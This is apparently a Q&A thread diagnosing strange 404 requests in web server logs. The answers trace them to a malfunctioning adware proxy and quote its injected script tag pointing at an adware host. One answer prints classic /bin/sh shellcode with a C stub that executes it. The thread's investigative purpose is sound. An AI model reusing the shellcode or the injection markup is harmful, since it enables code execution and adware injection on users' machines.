17

About three weeks ago, my site started receiving a lot of strange, recurring HTTP requests from my users.

I'm familiar with the malicious scans that happen on a daily basis, but these requests seem to be different. I believe they come from a malfunctioning browser, extension or piece of JavaScript somewhere, rather than from anything malicious.

Here's a small sample of the requests from one user (although it affects various user agents and users):

[22/Jul/2014:20:57:49 +0100] "GET /groups/%60%EF%BF%BD%18%01?o=3&g=&s=&z=\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-X? HTTP/1.1" 404 723  "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" "-"
[22/Jul/2014:20:58:11 +0100] "GET /members/%EF%BF%BD%EF%BF%BD%18%01?o=3&g=&s=&z=\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-X? HTTP/1.1" 404 5176  "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" "-"
[22/Jul/2014:20:58:45 +0100] "GET /%EF%BF%BD%EF%BF%BD%18%01?o=3&g=&s=&z=\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-X? HTTP/1.1" 404 5345  "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" "-"
[22/Jul/2014:20:59:18 +0100] "GET /groups/%EF%BF%BD%EF%BF%BD%18%01?o=3&g=&s=&z=\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-X? HTTP/1.1" 404 723  "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" "-"
[22/Jul/2014:20:59:41 +0100] "GET /groups/%EF%BF%BDi%19%01?o=3&g=&s=&z=\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-X? HTTP/1.1" 404 723  "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" "-"
[22/Jul/2014:21:00:06 +0100] "GET /%EF%BF%BDg%19%01?o=3&g=&s=&z=\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-X? HTTP/1.1" 404 5008  "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" "-"
[22/Jul/2014:21:00:30 +0100] "GET /%EF%BF%BDc%19%01?o=3&g=&s=&z=\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-X? HTTP/1.1" 404 4991  "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" "-"
[22/Jul/2014:21:01:35 +0100] "GET /%EF%BF%BD%EF%BF%BD%18%01?o=3&g=&s=&z=\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-X? HTTP/1.1" 404 5167  "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" "-"
[22/Jul/2014:21:03:08 +0100] "GET /%EF%BF%BD%EF%BF%BD%18%01?o=3&g=&s=&z=\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-X? HTTP/1.1" 404 5129  "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" "-"
[22/Jul/2014:21:04:35 +0100] "GET /groups/%EF%BF%BDj%19%01?o=3&g=&s=&z=\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-X? HTTP/1.1" 404 723  "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" "-"
[22/Jul/2014:21:05:21 +0100] "GET /%EF%BF%BDf%19%01?o=3&g=&s=&z=\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-X? HTTP/1.1" 404 5271  "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" "-"
[22/Jul/2014:21:07:01 +0100] "GET /groups/%EF%BF%BDc%19%01?o=3&g=&s=&z=\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-X? HTTP/1.1" 404 723  "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" "-"
[22/Jul/2014:21:12:44 +0100] "GET /P%EF%BF%BD%16%01?o=3&g=&s=&z=\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-X? HTTP/1.1" 404 5161  "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" "-"
[22/Jul/2014:21:13:04 +0100] "GET /%EF%BF%BDO%0F%01?o=3&g=&s=&z=\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-X? HTTP/1.1" 404 5328  "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" "-"
[22/Jul/2014:21:13:52 +0100] "GET /groups/0%EF%BF%BD%18%01?o=3&g=&s=&z=\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-X? HTTP/1.1" 404 723  "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" "-"
[22/Jul/2014:21:14:14 +0100] "GET /groups/%EF%BF%BD%EF%BF%BD%18%01?o=3&g=&s=&z=\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-X? HTTP/1.1" 404 723  "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" "-"
[22/Jul/2014:21:14:34 +0100] "GET /@%EF%BF%BD%16%01?o=3&g=&s=&z=\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-X? HTTP/1.1" 404 5347  "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" "-"
[22/Jul/2014:21:15:04 +0100] "GET /@%EF%BF%BD%16%01?o=3&g=&s=&z=\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-X? HTTP/1.1" 404 4942  "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" "-"
[22/Jul/2014:21:15:11 +0100] "GET /groups/%EF%BF%BD%18%01?o=3&g=&s=&z=\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-X? HTTP/1.1" 404 723  "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" "-"
[22/Jul/2014:21:16:05 +0100] "GET /p%EF%BF%BD%18%01?o=3&g=&s=&z=\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-X? HTTP/1.1" 404 5020  "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" "-"
[23/Jul/2014:01:11:58 +0100] "GET /%EF%BF%BD%07%1B%01?o=3&g=&s=&z=\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-\x//\x,/\x,-X? HTTP/1.1" 404 4877  "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" "-"

I've studied it in detail but am drawing a blank. Here's what I've concluded so far...

  • Most of these requests are coming from long-term users who are logged into my site, and they all started sending them around the same time

  • I started logging the request method, and they are all standard HTTP requests rather than malfunctioning XMLHttpRequest calls

  • I isolated a few users who seem to send them frequently, and started capturing and logging the HTML of the page I sent them just before. I'm fairly confident there is nothing at all in my HTML that could be prompting their browsers to generate these requests. My site and database are fully UTF-8. I'm also confident my site has not been compromised, and I do not serve scripts or ads from third parties, other than Google Analytics.

  • They always contain %EF%BF%BD, which is the percent-encoded form of the bytes EF BF BD, the UTF-8 encoding of the Unicode replacement character (U+FFFD)

  • The requests always contain GET params o, g, s, z

  • It doesn't happen for all users, and I cannot reproduce it on a variety of Windows, Mac or mobile browsers.

  • For certain users, as they browse around my site, a valid page request is followed by one or more of these requests around 40% of the time (and they access the same directory as the preceding valid request)
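
The %EF%BF%BD observation is easy to verify. The following is a minimal Python sketch using one path copied from the log sample above; the variable names are only illustrative. It also shows one way such bytes can arise (non-text bytes decoded leniently as UTF-8), which is an assumption about the cause rather than something the logs prove.

```python
from urllib.parse import unquote_to_bytes

# Path copied from the first log line above
path = "/groups/%60%EF%BF%BD%18%01"

raw = unquote_to_bytes(path)   # undo the percent-encoding
text = raw.decode("utf-8")     # the resulting bytes are valid UTF-8

# EF BF BD decodes to U+FFFD, the Unicode replacement character
has_replacement = "\ufffd" in text

# Assumption for illustration: U+FFFD typically appears when bytes that are
# not valid UTF-8 are decoded leniently, e.g. a lone 0xD0 lead byte.
lenient = b"\xd0".decode("utf-8", errors="replace")

print(raw)
print(has_replacement, lenient == "\ufffd")
```

The remaining bytes in the path (such as 0x18 and 0x01) are control characters, which is at least consistent with binary data ending up where a URL was expected.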

I'd love some help on this; maybe someone will look at the params and recognise what could be causing it.

The possible explanations I can think of are:

  • Some jQuery regression (yet they aren't Ajax requests)
  • Some regression with Google Maps (cannot reproduce)
  • Maybe a popular browser extension which has suddenly started going haywire
Neurone
carpii
  • We have been seeing this on a public production site. Our error logging captures all the details of the request so we can see that it's not from a logged-in user and highly unlikely that it's a user following a link from any of our web properties. I think it's a bot crawling for URL parsing vulnerabilities. – thom_nic Jul 24 '14 at 13:41
  • Interesting, are the requests you're seeing of an identical form to mine or simply similar? In my case they are definitely from logged-in users, apart from the odd stray request, although those usually send one request and no more. For the users, I am now suspecting it is malware-based, but maybe there are a few bots trying it too. – carpii Jul 24 '14 at 19:32
  • They all look similar (but not identical) to this: `http://www.mysite.com/%EF%BF%BD?o=2&g=&s=&z=`. UA (if you believe it) is always reported as some version of IE - split between IE 7/9/10 and Win 7/8/Vista. – thom_nic Jul 28 '14 at 15:25
  • Wonder if it's an issue with charset conversion from ISO8859-1 to UTF-8? http://codingrigour.wordpress.com/2011/02/17/the-case-of-the-mysterious-characters/ – thom_nic Jul 28 '14 at 15:32
  • @thom_nic Thanks, that's interesting. I think I will just put it down to a client-side issue. It's strange that it has suddenly started happening in the past month or so; prior to that, nothing – carpii Jul 28 '14 at 22:17
  • @thom_nic I did consider charset, it has that sort of feel about it, especially with the 'unprintable' character. But the occasional request has a @ prefix like /@%EF%BF%BD too. I'm confident my site is fully UTF-8 and there are no URLs I could be passing back in this form (I don't use those GET params either) – carpii Jul 28 '14 at 22:19
  • I have a very similar issue here: http://stackoverflow.com/questions/25222973/weird-characters-in-url/ It happens with our logged-in human users. I suppose there is a virus or a malicious browser extension that causes this. – trante Aug 26 '14 at 06:31
  • @carpii, out of interest, did you ever get to the bottom of this issue? Perhaps you could create an answer with what you found, how you fixed it, etc. – Chris Murray Aug 26 '14 at 15:30
  • Are these requests always from Windows User Agents? Your question and the stackoverflow question both only list windows user agents (from Chrome, Firefox, and IE11). – dr jimbob Aug 26 '14 at 17:20
  • @ChrisMurray I never got to understand it fully, and it's still an ongoing 'issue'. I've ruled out any changes to my site that could be causing it, which I guess only leaves 1) Client-side malware 2) A misbehaving browser extension 3) Possibly ISP parental control or filtering doing something strange. – carpii Aug 27 '14 at 09:24
  • @drjimbob No, I'm seeing a wide range of user agents and platforms. The log was just a small section from one user, which is why it's entirely Windows – carpii Aug 27 '14 at 09:25
  • At nk.pl we observe 45k requests matching 'o=3&g=&s=&z=' daily, from 763 distinct users, 286 distinct UA strings, and 19335 distinct URLs. I can provide more details, but no explanation :( – qbolec Sep 25 '14 at 10:29
  • I'm still seeing them daily too. It's hugely annoying, but also surprising that I still can't find any malware via Google which operates like this. Thanks for the update though, at least I'm not alone :) – carpii Sep 26 '14 at 10:44
  • Russians: http://www.instructables.com/answers/What-causes-these-strange-characters-to-appear/ – j0h Sep 26 '14 at 15:41
  • @j0h, thanks but this is not the same issue. – carpii Sep 27 '14 at 12:31

3 Answers

4

Since all the requests fail with a "404 Not Found" status, try creating a custom 404 error page that logs everything (all headers, the request, the user's session) and use it to debug this. See whether the requests come from just a few users with a busted web browser (virus, trojan etc. on the client machine), from all users, only from users who are logged into your website, or from someone trying to attack your application.

If it's a problem on the client's side, there's not much you can do except track this and make sure it's not affecting your application.

On the other hand, if it's a problem on your side (server or application), this should give you at least something to analyze and some starting points for fixing the issue.

Here's a basic custom 404 page that does this:

<?php
/**
 * File: CustomError404.php
 * Custom 404 error page
 */

// Set the proper headers
if (!function_exists('http_response_code')) {
    header($_SERVER["SERVER_PROTOCOL"]." 404 Not Found");
    header("Status: 404 Not Found");
} else {
    http_response_code(404);
}

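// Start the session if needed; $_SESSION is undefined until session_start() runs
if (session_id() === '') {
    session_start();
}

// getallheaders() is not available under every SAPI, so fall back to $_SERVER
$headers = function_exists('getallheaders') ? getallheaders() : $_SERVER;

// Log whatever here...
$logMessage  = '**************************************************************' . PHP_EOL;
$logMessage .= '** Full request log - ' . date('Y-m-d H:i:s') . PHP_EOL;
$logMessage .= '**************************************************************' . PHP_EOL;
// $_REQUEST holds only the parameters, so record the raw URI (path included) too
$logMessage .= "REQUEST URI: " . $_SERVER['REQUEST_URI'] . PHP_EOL;
$logMessage .= "ALL HEADERS: " . PHP_EOL . print_r($headers, true);
$logMessage .= "REQUEST: " . PHP_EOL . print_r($_REQUEST, true);
$logMessage .= "SESSION: " . PHP_EOL . print_r($_SESSION, true);
$logMessage .= '**************************************************************' . PHP_EOL . PHP_EOL;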

// Write the log to a file
$logFile = __DIR__ . '/req_error.log';
file_put_contents($logFile, $logMessage, FILE_APPEND | LOCK_EX); // lock so concurrent requests don't interleave entries

// Display a message instead of a blank page
echo "<h1>404 Not Found</h1>";
echo "The page that you have requested could not be found.";
exit();

/* EOF */

To use it, simply upload this file to your application's root folder and put the following line in your virtual host or .htaccess configuration:

ErrorDocument 404 /CustomError404.php

You could customize this script further to log only the requests with the specific characteristics you're interested in. That way the log file contains just what you're looking for, without tons of extra "good" requests to filter through.
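
The same filtering can also be done offline against an existing access log instead of inside the PHP handler. Below is a rough Python sketch under a few assumptions: the log lines look like the sample in the question, and the regular expression and the `suspect_paths` name are made up for illustration and are not part of any tool.

```python
import re

# Illustrative pattern (an assumption, tune as needed): a GET whose path holds
# the percent-encoded replacement character and whose query is o, g, s, z.
SUSPECT = re.compile(
    r'"GET (?P<path>[^?\s]*%EF%BF%BD[^?\s]*)\?o=\d+&g=[^&\s]*&s=[^&\s]*&z=',
    re.IGNORECASE,
)

def suspect_paths(lines):
    """Yield the request path of each log line that matches SUSPECT."""
    for line in lines:
        match = SUSPECT.search(line)
        if match:
            yield match.group("path")

# Usage: the first line is abbreviated from the question's log sample,
# the second is an invented "good" request for contrast.
sample = [
    '[22/Jul/2014:20:57:49 +0100] "GET /groups/%60%EF%BF%BD%18%01?o=3&g=&s=&z=X? HTTP/1.1" 404 723',
    '[22/Jul/2014:20:57:40 +0100] "GET /groups/ HTTP/1.1" 200 5120',
]
print(list(suspect_paths(sample)))
```

To scan a real log, pass an open file object instead of the list, since iterating a file yields its lines.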

Thyamarkos
  • Thanks, but I've logged this already and am not able to tell much from the actual requests themselves. I already have a custom HTTP log format which allows me to log the user ID into the raw logs, so I'm able to see that it's affecting a wide range of users on different browsers. – carpii Jul 23 '14 at 21:36
  • @carpii well, have you tracked HTTP_REFERER? I have had similar links where a "smart redirect" entered a recursive loop that kept appending the same information to the GET because it failed to parse the old GET correctly. – guest Jul 23 '14 at 22:08
  • Hi, yes I do track the referrer. What typically happens is they request a (valid) page from my site, and then this is followed up by the rogue request, with the valid page as the referrer. This would normally lead to the conclusion that there is something on that page causing the rogue requests. However, I'm confident this isn't the case, and in some cases the user requests the identical page twice, yet only one of those requests causes a rogue request. It's very strange :( – carpii Jul 23 '14 at 23:24
  • This actually looks a lot like someone tried to inject some extra code into your website - maybe your server got hacked or someone managed to get in via some XSS or SQL injection. If you have any sort of backup or version control system on your production server, try to get a copy of the files from before this issue started to occur and do a diff with the current version of the files. Pay close attention to any JS code, especially obfuscated JavaScript with lots of base64 characters, and to your embedded images (again, see if you have any funny-looking base64 strings in your code). – Thyamarkos Jul 24 '14 at 00:52
  • Good idea. My codebase is git-backed and firewalled to me via knockd. I've checked git and also compared md5 checksums of all files with my local repo, and there is no difference. But you've reminded me to check php.ini and config too. I guess it's conceivable that something could be placed outside the repo and included via a compromised config (auto_prepend_file in php.ini etc.), however unlikely it seems at the moment – carpii Jul 24 '14 at 04:14
  • Just to confirm (since I've now added a bounty), there were no git or PHP config issues causing this. – carpii Sep 27 '14 at 12:32
4

These requests are caused by Adware:Win32/Adpeak malfunctioning (yeah, believe it or not, even malware can malfunction).

It sets up a proxy server on the infected systems that injects script tags in all HTML content that passes through it, similar to

<script type="text/javascript" id="2f2a695a6afce2c2d833c706cd677a8e" src="http://d.lqw.me/xuiow/?g=750C2C5B-CF42-6996-0E5A-306165564128&s=F5D333A8-C748-4686-AE0A-9E008F670C22&z=1384886096"></script>

Under some specific circumstances the host name and the GET parameter values can get corrupted, and that's when you see requests like the ones the OP posted 404'ing in your logs.

Read more in the related thread on SO.
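
One plausible reading of this, offered as an assumption rather than something confirmed here: if the corrupted `src` no longer starts with a scheme and host, the browser treats it as a relative URL and resolves it against the page being viewed, which would explain why the rogue requests land in the same directory as the preceding valid request. A minimal Python sketch of that resolution, with `example.com` and the page path as hypothetical placeholders:

```python
from urllib.parse import urljoin

# Hypothetical page the user was viewing (placeholder host and path)
page = "http://example.com/groups/some-group"

# A corrupted src with no scheme or host left, modelled on the logged requests
corrupted_src = "%EF%BF%BD%18%01?o=3&g=&s=&z="

# Relative references resolve against the directory of the current page
resolved = urljoin(page, corrupted_src)
print(resolved)
```

The resolved URL has the same shape as the /groups/ entries in the question's log, with the page itself then showing up as the referrer.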

antichris
  • You are awesome! I've been tearing my hair out for weeks about this, wondering what could be causing it. Thanks so much :-) – carpii Nov 01 '14 at 22:19
0

This reminds me of:

char shellcode[] =
"\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
"\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
"\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";

void main() {
   int *ret;

   ret = (int *)&ret + 2;
   (*ret) = (int)shellcode;
}

I think there are some fishy machines trying to execute shellcode on your website.

H3lp3ingth3p33ps